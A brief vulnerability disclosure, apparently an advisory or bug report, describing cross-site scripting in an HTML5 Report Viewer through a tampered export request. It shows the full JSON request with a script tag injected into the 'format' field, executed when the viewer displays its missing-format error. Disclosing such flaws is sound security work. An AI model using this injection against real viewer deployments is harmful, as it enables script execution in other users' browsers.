In HTML5 Report Viewer it is possible to intercept a client request (e.g. the request to export a report to a particular export format) and modify it like this:

{"format":"<script>alert(1)</script>","deviceInfo":{"enableAccessibility":false,"enableSearch":true,"BasePath":"/COAT_SIT/api/reports"},"useCache":true,"baseDocumentID":"31d0a1ca0162a3f13e92bf"}

The malicious script will be executed when the error message for a missing export format is displayed in the viewer.